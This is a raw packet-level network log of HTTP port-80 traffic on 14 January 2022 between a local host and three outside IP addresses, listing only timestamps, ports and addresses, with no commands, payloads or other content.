Jan 14, 2022 00:16:14.849373102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849482059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849592924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849697113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849827051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849931955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850039959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850143909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850259066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850358009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850471020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850579977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850687981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850811005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.850918055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851027012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851134062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851238012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851346016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851449966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851560116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851665020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851783037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851902008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.851932049 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.852039099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852152109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852267981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852368116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852473974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852586985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852698088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852816105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.852926016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.853030920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.853135109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.853244066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.856620073 CET	80	49922	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.857028961 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857054949 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857078075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857100964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857121944 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857122898 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857147932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857160091 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857173920 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857197046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857222080 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857234955 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857244968 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857260942 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857279062 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857304096 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857315063 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857328892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857352018 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857367039 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857374907 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857400894 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857405901 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857420921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857445002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857466936 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857470989 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857491970 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857512951 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857515097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857539892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857563972 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857568026 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857589006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857610941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857611895 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857635021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857657909 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857657909 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857682943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.857698917 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.857745886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859194040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859220982 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859241009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859266043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859289885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859304905 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859314919 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859318972 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859339952 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859361887 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859369040 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859385014 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859409094 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859417915 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859431982 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859463930 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859483004 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859486103 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859512091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859534979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859534025 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859560013 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859560966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859584093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859602928 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859607935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859630108 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859653950 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859662056 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859677076 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859699965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859705925 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859723091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859746933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859755993 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859770060 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859791994 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859797955 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859813929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859838009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859844923 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859860897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859883070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859899998 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859910011 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859932899 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859935999 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.859956026 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859978914 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.859999895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.860003948 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.860023975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.860044003 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.860045910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.860068083 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.860080004 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.860090971 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.860114098 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.860129118 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.860148907 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.860214949 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.869350910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.869637012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.869756937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.869863987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.869982004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870071888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870179892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870274067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870374918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870484114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870582104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870680094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870785952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870883942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.870981932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871082067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871184111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871294975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871407986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871505976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871608019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871704102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871807098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.871908903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872015953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872113943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872212887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872313023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872414112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872518063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872632980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872730970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872836113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.872931004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873028040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873123884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873224020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873320103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873428106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873526096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873630047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873728991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873831034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.873936892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874042988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874140024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874238014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874337912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874437094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874542952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874644041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874744892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874845982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.874941111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875051022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875143051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875236034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875333071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875427008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875518084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875636101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875735998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.875842094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.877728939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.877952099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878082037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878196001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878308058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878413916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878518105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878626108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878753901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878864050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.878971100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879076958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879213095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879324913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879431009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879545927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879694939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879826069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.879934072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.880038023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.880157948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.880243063 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.880265951 CET	80	49923	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.880383015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.880516052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.880677938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.880795956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.880903959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881009102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881113052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881222010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881330013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881436110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881546021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881649017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881763935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.881900072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882004023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882112026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882219076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882327080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882433891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882541895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882658005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882772923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882889986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.882987976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883089066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883189917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883290052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883390903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883488894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883610010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883729935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883855104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.883961916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884068966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884177923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884283066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884392023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884500980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884608030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884718895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884840012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.884948969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.885059118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.885123014 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.885179043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.885328054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.885433912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.885535955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.885647058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.890784025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.891839981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.891963959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892061949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892153978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892246962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892349005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892443895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892543077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892633915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892730951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892846107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.892946005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893037081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893150091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893249989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893347025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893445969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893551111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893659115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893768072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893867016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.893963099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.894062042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.894166946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.894267082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.894370079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.894469023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.894566059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.894666910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.895118952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.895222902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.895324945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.895418882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.895519972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.897397041 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.899162054 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.901958942 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.913290024 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.913310051 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.918730021 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.929930925 CET	80	49923	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.930030107 CET	49923	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.932312965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932362080 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932385921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932410002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932410955 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932430983 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932471991 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932496071 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932504892 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932519913 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932524920 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932559967 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932580948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932590961 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932601929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932624102 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932640076 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932682991 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932800055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932823896 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932843924 CET	80	49920	141.8.194.74	192.168.2.4
